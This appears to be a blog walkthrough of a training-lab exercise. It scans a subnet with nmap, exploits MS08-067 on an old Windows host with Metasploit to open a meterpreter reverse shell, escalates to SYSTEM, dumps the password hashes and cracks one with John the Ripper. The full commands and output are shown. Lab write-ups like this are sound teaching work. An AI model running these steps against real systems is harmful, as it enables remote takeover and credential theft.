The Dangers of Windows XP On Your Network

XP has not been supported in years! A flaw has existed for a large percentage of that unsupported time frame that allows for complete control of the asset.

This XP machine is found at the labs of https://pentest.training. I strongly urge you to log in and have a poke around, especially if your lacking the finances or knowledge to create your own lab.

So we are using OpenVPN to connect to the labs hosted at http://pentest.training. On the network is an XP box. Our mission is to hunt it down and own it. Its possibly the lowest hanging fruit you’ll find in any network and today we will show you why.

Once in the network you’ll find you’re given an IP in the realm of 10.0.100.x. This is only your VPN tunnel as shown in ifconfig. Go back to the OpenVPN connection window you launched

Sat Jan 13 10:18:27 2018 us=654083 /sbin/ip route add 10.0.10.0/24 via 10.0.100.161
Sat Jan 13 10:18:27 2018 us=667003 /sbin/ip route add 10.0.100.1/32 via 10.0.100.161

See how its setting up the routes for you. there is 10.0.10.0/24 available for you. So we should start there. Whilst we could do an nmap discovery scan for all assets, I’m only interested in XP assets. so I’m going to try and enumerate the operating systems of all machines on this subnet:

nmap -O 10.0.10.0/24

Output will display its presumptions on the OS of all devices it scanned/enumerated within the subnet, searching through this list we find a Windows box.

Nmap scan report for 10.0.10.103
Host is up (0.088s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1027/tcp open IIS
1028/tcp open unknown
3389/tcp open ms-wbt-server
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=1/13%OT=21%CT=1%CU=41667%PV=Y%DS=2%DC=I%G=Y%TM=5A59DF7
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=2%ISR=10D%TI=I%CI=I%TS=0)SEQ(SP=FD
OS:%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=0)OPS(O1=M558NW0NNT00NNS%O2=M558NW
OS:0NNT00NNS%O3=M558NW0NNT00%O4=M558NW0NNT00NNS%O5=M558NW0NNT00NNS%O6=M558N
OS:NT00NNS)WIN(W1=4000%W2=4000%W3=4000%W4=4000%W5=4000%W6=4000)ECN(R=Y%DF=N
OS:%T=80%W=4000%O=M558NW0NNS%CC=N%Q=)T1(R=Y%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=
OS:)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=N%T=80%W=4000%S=
OS:O%A=S+%F=AS%O=M558NW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80
OS:%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+
F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=80%IPL=B0%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
OS:DFI=S%T=80%CD=Z)

We know this is a Windows box due to the ports that are currently open. In a work environment its common to see 135,139 and 445 open for use with file sharing protocols. IIS is another indicator that it is a Microsoft asset. Normally nmap would identify it as XP off the bat, but we now have to dig further to uncover what it is.

Enumerating a little further to confirm what’s running here we use:

nmap -sV 10.0.10.103

Which will give us the “Service Version” of the ports. This gives us a more detailed output:

root@AttackBox:~# nmap -sV 10.0.10.103

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-13 10:34 GMT
Nmap scan report for 10.0.10.103
Host is up (0.098s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Xlight ftpd 3.8
80/tcp   open  http          Microsoft IIS httpd 6.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
1027/tcp open  msrpc         Microsoft Windows RPC
1028/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.46 seconds

Now we are pretty sure this is an XP asset (or an extremely poorly configured Windows box). Lets fire up our MetaSploit console using:

msfconsole

Once in we can start to build our attack stagers. We will be using the well known exploit for MS08-067 which has left XP vulnerable and an easy target. We can search for the exploit using:

search ms08_067

Now we can prep the attack. Firstly getting the payload set up then configuring the exploit….

msf > use payload/windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > options

Module options (payload/windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

msf payload(reverse_tcp) > set LHOST 10.0.100.162
LHOST => 10.0.100.162
msf payload(reverse_tcp) > search ms08_067
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption




msf payload(reverse_tcp) > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)




Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting




msf exploit(ms08_067_netapi) > set RHOST 10.0.10.103
RHOST => 10.0.10.103
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.0.100.162:4444 
[*] 10.0.10.103:445 - Automatically detecting the target...
[*] 10.0.10.103:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 10.0.10.103:445 - We could not detect the language pack, defaulting to English
[*] 10.0.10.103:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 10.0.10.103:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.0.10.103
[*] Meterpreter session 1 opened (10.0.100.162:4444 -> 10.0.10.103:1165) at 2018-01-13 10:55:46 +0000

meterpreter >

Now we have a meterpreter shell we can raise ourselves to system with no hassles and dump the local hashes. I always use ifconfig/ipconfig on a new system to orientate myself on any new system. Should the system be multi-homed you’ll instantly open up an avenue of attack to scan while you work more on the local box.

meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1




Interface 65539
============
Name         : Realtek RTL8139 Family PCI Fast Ethernet NIC
Hardware MAC : 36:71:58:17:48:d4
MTU          : 1500
IPv4 Address : 10.0.10.103
IPv4 Netmask : 255.255.255.0




meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > hashdump
Administrator:500:62eda20bfe122e1ffcff707fcab12bbb:655d1f38d5f2d9c44b2d807dccdbf8c7:::
ASPNET:1007:b3e5cccfedf674b1af941a4c244b4a37:37eb9ecbe24ce87801f3cc5ed0236e55:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WIN2K3:1003:462782f4bea3ee6fcd93ab145a7a72ed:888efd92ee2f6df097b1c030fe137129:::
IWAM_WIN2K3:1004:756461186864d115b2e6f6d1864bce53:bdff2ae5f2a87d3fc1c754b11726f4b6:::
ned:1008:7ecf9e1d993c2b3b3180a3e4909c3aaa:9830f413f074ae2a2decf1f2193f170f:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:cbdab80c3d45744ed6f1eea41c0ac9fd:::

meterpreter >

pro tip about the hashes. The number between the username and the hash…:

  • A 500 indicates an administrative account
  • and a 501 is a guest account.

Sometimes admins rename guest to admin in order to throw attackers down the wrong path… so keep an eye out for that!

For the sake of shits and giggles since we have the passwords… let slap them through john quickly. Paste them into a file on the desktop creatively called “hashes” and slap them through John

root@AttackBox:~# john --rules=ALL ~/Desktop/hashes 
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT-old"
Use the "--format=NT-old" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 12 password hashes with no different salts (LM [DES 128/128 AVX-16])
Remaining 9 password hashes with no different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
SUMM3RL          (ned:1)
1g 0:00:00:32 11.91% 2/3 (ETA: 11:08:01) 0.03090g/s 743177p/s 743177c/s 6246KC/s DOORS*9..@SDFGH
Warning: passwords printed above might be partial
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

Silly ned.

 

 


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s